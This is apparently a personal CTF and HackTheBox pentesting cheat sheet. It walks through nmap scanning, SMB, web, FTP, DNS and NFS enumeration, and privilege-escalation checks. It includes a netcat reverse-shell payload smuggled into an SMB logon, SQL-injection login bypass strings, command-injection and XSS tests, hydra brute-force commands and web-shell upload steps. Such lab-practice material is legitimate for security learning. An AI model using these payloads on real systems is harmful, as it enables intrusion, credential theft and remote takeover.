HackFlow the Process

Documenting the process

more at apt-secure.ca

How to Use HackFLow


General Data:

  • wordlists: /usr/share/wordlists

  • python script for determining use of random port assignments link

  • the below command will scan ALL open ports on a system. it is not stealthy. it is straight from HTB. Would not use in a professional setting but in CTF, it's fine. (-p-) switch will take a long time even with the -T4

    • ports=$(nmap -p- --min-rate=1000 -T4 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

    • #nmap -sC -sV -p$ports

  • Power Usage nmap:

    • searching for vulns for particular service

      • #ls /usr/share/nmap/scripts/ | grep smb | grep vuln

      • followed by

      • #nmap -p 139 --script smb* <IP> -oN <outputfilename>.txt

  • Finding files on target

    • #find / -name <filename_and_extension> 2>/dev/null

    • #find /home/ -type f -size 1033c -name "file_name.*"

  • #find / -type f -user root

  • #find / -type f -group root

  • read file with "-" at beginning

    • #cat < file.txt

Beginning of Hack Flow

  • VPN on?

  • Have you switched VPN locations?

  • are you using proxychains? link1 link2 link3

  • ping target

    • yes: continue

    • no: check connection

      • try port scans with sA, experiment with -Pn -n

      • go back and check network

      • be aware that you may still have connection however a FW could be stopping ICMP packets

Initial Interaction

  • Consider adding target IP to /etc/hosts for expedited work (so you are not typing the IP address in a ton)

    • see image below

  • #nmap -sS -T4 target

    • save results. I do this first to get a general idea of what I am looking at

  • #nmap -sV -sC target

    • grab service versions and any initial default script output

  • #nmap -sV --script vulners.nse target

    • this can come back with a ton of information. Can feel like a shotgun approach however it can provide good direction

    • output can be large-->recommended output to file (-oN)

  • #nmap -vv --reason -Pn -A --osscan-guess --version-all -p- <IP>

  • Leverage the entire vuln database of nmap

    • #nmap --script vuln <IP>

    • /usr/share/nmap/scripts/script.db -->is a local DB that list all the vulnerabilities and exploits (scans) available to nmap

    • see "General Data" for power usage

Add IP to /etc/hosts so you can use a given name in our pentest


  • from nmap scan you have open

    • 139/445 netbios-ssn

    • 445/1433 typically associated with file sharing (SMB)

    • get version

  • Attempt a mapping first

    • #smbmap -H <IP>

    • try this as well. "0xdf" sends an error code

      • #smbmap -h a.htb -u "0xdf -p"0xdf

  • Gather more information with enum4linux

    • #enum4linux -a target_ip

  • Check for remote shares

    • #smbclient -L //target_ip

      • if it shows you shares you this is good!

  • Check anonymous access

    • #smbclient -N -L \\\\IP\\

      • anonymous allowed?

        • yes

          • look at files and pick one, do this for all (ex.backups)

            • #smbclient -N \\\\IP\\backups

            • #smbclient -N //<IP>/<share_name>

              • can you connect to the share?

                • yes

                  • attempt reverse shell

                  • set up listener on attacker #nc -nlvp 4444

                  • while connected to smb --> #logon "/=`nc <attacker IP> 4444 -e /bin/bash`"

    • Leverage nmap to grab potential exploits

      • #nmap -p 445 -script vuln a.htb


General SAMBA


Fix: Your client may not be set up to work with older SMB versions. allow your client to do so.

add the above line to /etc/samba/smb.conf


  • No matter what web application you are working with. Go and find the default credentials and try them out

  • Look at page source-->does anything jump out?

  • Conduct information gathering

    • click on everything and observe changes in the URL.

    • modify the URL and see if anything changes.

  • you have a port open up browser insert IP:port

  • navigate around to all pages

  • insert single quote in forms to see if it is "easy" vulnerable to sql injection

  • attach "/sites/" to end of IP to see if you see anything

  • in terminal run

    • #whatweb target.url -> this will tell you technologies/services associated with the site

  • #nikto -h target_ip

    • put header info into google > " "header_info" cve"

  • webcontent scanner DIRB

    • #dirb http://xyz.com -r -z 10

      • -r = non recursive

      • -z = 10 millisecond delay

  • Directory brute force gobuster

    • cheat sheet link

    • after you discover directories put the new data into URL and click on everything

    • use different wordlists */usr/share/wordlists" download more if needed

    • #gobuster dir -u -w /usr/share/wordlists/common.txt -t 100

      • wordlists that have worked (take note that this is brute force, so the size of the file increases the options attempted)

        • /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

        • /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

      • additional switches to add (being specific can help you discover exposed directories faster)(if you know that php is present run the command below!)

        • #gobuster dir -u -w /usr/share/wordlists/common.txt -e -s "200,301,302,401" -x "php" -t 100

          • -x specifies extentions

          • -s string to look for

          • -e specify extended mode that renders the full URL

  • Test for webdav (link) is an extension of HTTP that allows clients to perform remote web content authoring.

    • run this scan

    • #nmap --script http-webdav-scan -p80,8080 a.htb

    • using metasploit

      • #use scanner/http/webdav_scanner

        • #set rhosts

        • #set path

        • #run

    • run davtest (tests to see what kinds of files can be uploaded)

      • #davtest -url http://<IP> (davtest can be wonky, however if your scanner returned with positive for webdav it's worth further digging

      • #cadver <ip> a command land webdav editor

        • commands (ls/cd/get/mget/put/mput)

        • access gained?

          • yes

      • You can use curl to upload files to a webdav vulnerable site link

Testing User Inputs

  • Try manual testing SQL injections (see below)

  • open up "inspect element">network>click submit button with data in fields >observe any changes

  • manually testing inputs is first step but it could be time to use burpsuite

  • open BurpSuite>start proxy browser(intercept on)>step through website and observe changes (link)

    • POST has base64 data?

  • Test Command Injection

    • php may be working in the background

    • try putting a ; at the end of the known good input and putting a command like ;whoami

      • without proper sanitization you can potentially be shown data you shouldn't know

        • #cat /etc/passwd

        • #cat /etc/shadow

        • #ls /

  • Test Stored XSS Vuln

    • Use javascript special characters to see if you can cause an error, or test if they are allowed which means we could be looking at a XSS

      • ";<>

      • "

      • <

      • >

      • ;

      • also

      • <script>alert('XSS')</script>

  • Cookie Forgery

    • You could have an opportunity for Cookie forgery. Follow video link for BASIC cookie session forgery

Accessed Gained

What is in /var/www? Does your current user have control of this directory? Can you upload anything that could escalate privileges?

  • consider the python httpserver in tools

  • check permissions #ls -la

  • do local enumeration (linux/wndows) what binaries run at an admin level

WEBAPP (SQL Injections)

Manual Checking

  • open firefox

  • right click submit button>inspect element

    • network>All>form data

    • document the format for the form

    • attempt brute force

    • #hydra -s -V -L <user_wordlist> -P <pass_wordlist> admin.cronos.htb http-post-form "/:username=^USER^&password=^PASS^&:invalid"

Manual Testing (both user/pass, user only, pass only) link

Login Bypass

  • admin' --

  • admin' -- -

  • admin' #

  • admin'/*

  • ' or 1=1--

  • ' or 1=1#

  • ' or 1=1/*

  • ') or '1'='1--

  • ') or ('1'='1--

  • user' or 1=1;#

  • user' or 1=1 LIMIT 1;#

  • user' or 1=1 LIMIT 0,1;#

Finding Command Execution

  • you have found a form that sends a command.

    • is target OS Linux?

      • yes

        • stack a command onto the end of an expected command

          • put a ";" (semicolon) at the end of command and put "whoami" see what happens

terminal in browser

  • grab list of any/all users

    • #cat /etc/passwd

      • you may need to switch users

  • depending on user permissions

    • get python version

      • $whereis python

    • poke around for user flag

    • run #sudo -l (this will tell you what commands you can do)

    • attempt python priv escalation from terminal link

    • be aware that more is available to you with an upgraded shell. here are instructions to upgrade your shell using python link


  • general connect(banner grabbing). you can find out service version easily

    • #ftp <IPADDR>

  • test anonymous login link

    • This will feed you directory listings.

      • #nmap -sV -sC <IPADDR> -p21

  • Try to login

    • #ftp <IPAADR >21

      • use some default creds like

        • anonymous/anonymous

        • admin/admin

        • root/root

        • empty/empty

        • Anonymous allowed?

          • yes (follow these steps, or continue down to "Access Gained")

            • examine all available files for critical info (creds)

            • use #ls -la to determine if you have c:/ access (windows)

            • Do you have C:/ access?

              • yes

                • continue to FTP Priv Escalation

          • no

            • you can attempt brute force

-metasploit anonymous login check link

-ftp brute force


Access Gained:

  • this means that you either are able to log in with acquired user credentials or can navigate with anonymous

  • The FTP may have nothing of value, however depending on what is in there you may want to consider uploading a file (like a web shell)

    • video demo

    • asp.net present

    • from attacker (method 1)

      • #locate cmd.aspx

      • #cp <path/file> <wherever_you_want_it>

      • connect with ftp

      • #put <file>

      • open browser on attacker

        • http://<IP>/<file you put>

        • worked?

          • yes

    • method 2 (upload reverse shell aspx)

      • follow link for instructions link


general ftp

client side commands link


Brute Force

  • #hydra -s 2222 -l <username> -P <path to wordlist> <IP> -t 4 ssh

    • -l = single user name

      • -L = to use word list for user names

    • -P = path to wordlist

    • -t 4 number of threads (brute force can take a long time, so leverage your resources)

    • -s = changing the port(not all ssh is 22, default for hydra is 22)

Access Gained Now Privilege Escalation:

  • run commands

    • check if you can sudo

      • #sudo -l

        • This will tell you the commands you can run as sudo which can lead to escalation

      • #echo $PATH

      • get OS info

        • #(cat /proc/version || uname -a ) 2>/dev/null

      • get ENV variables (can contain API keys the env variable)

        • #(env || set) 2>/dev/null

      • examine file capabilities(start with root " / " )

        • #getcap -r / 2>/dev/null

          • if you find cap_setuid as a binary go here

Local Enumeration


  • CVE-2006-3392

  • get users

    • #net users

  • get hostname

    • #hostname

  • look at user specific details (Are any users included in the admin group)

    • #net user <username>

  • look at networking (interfaces,routing table etc.)

    • #ipconfig /all

    • #route print

  • look at arp cache

    • #arp -A

  • look at network connections and firewall rules

    • #netstat -ano

    • #netsh firewall show state

  • Look at scheduled tasks (may need elevated permissions)

    • #schtasks /query /fo LIST /v

  • Analyze running processes to started services

    • #tasklist /SVC

  • look at systeminfo.exe

    • check out this page for power usage link

    • What kind of things are we looking for?

      • patches

      • OS Version

      • Original install time

      • BIOS Version

      • network cards (pivots)

  • Determine .NET versions

    • #reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

    • Can also look up directories

      • #cd c:\Windows\Microsfot.NET\Framework

      • #dir

  • Find third party drivers

    • #driverquery /v


  • important commands

    • whoami/id/hostname/uname/pwd/ifconfig/ip/netstat/ss/ps/who/env/lsblk/lsusb/lsof/lspci/hostname

  • print system info

    • #uname -a

  • kernel release

    • #uname -r

  • find users with group "0"

    • #grep 'x:0:' /etc/passwd

  • look at scheduled tasks

    • #crontab -e


  • #~/.bash_history

  • #cat /etc/passwd

  • #cat /etc/shadow

"find" Power Usage

  • #find / -name <filename_and_extension> 2>/dev/null

  • #find -type f -name "*.bak" 2>/dev/null

  • #find -type f -name "*.log" 2>/dev/null

find SUID binary

SUID binary exploitation involves a binary with it sSUID bit set so that any thing executed by the program will do so with privileges of that user

  • #find / -perm -4000 2>/dev/null


reference link

initial interaction

We want to find information like domain.

is DNS running TCP or UDP? (TCP is an oopsie doopsie)

banner grab

  • #nmap -sSU -p 53 --script dns-nsid a.htb

Domain info gathering

  • #nslookup

  • #server <IP>

  • #<IP>

zone transfer (add domain the /etc/hosts)

  • #dig axfr @IP <domain name>

    • zone transfer works

      • add new nameservers to your /etc/hosts

      • subdomain brute force

        • #gobuster dns -d <domain name> -w /usr/share/wordlists/all_dns.txt -t 100

          • huge subdomain list can be found here link

          • DNS SecLists link (I use bitquark-subdoamins-top100000.txt)

other nmap

  • #nmap --script fcrdns <IP>

  • #nmap --script dns-srv-enum <IP>

  • #nmap --script dns-random-txid <IP>

  • #nmap --script dns-random-srcport <IP>


  • link showing early steps (including steps below for RPC)

    • follow link above to see instructions on grabbing /etc/passwd and /etc/shadow and using JTR to crack password

    • additionally there are further instructions on adding yourself to sudoers (priv esclation)

  • RPC Bind Hack (potentially port 111)

    • #nmap -p111 --script nfs* <IP>

    • Do you see a mount point?

      • yes

        • make a directory #mkdir myDemo

        • #sudo mount -o nolock <IP>:<mount_point> <location_of_myDemo>

        • if successful you can now navigate to this share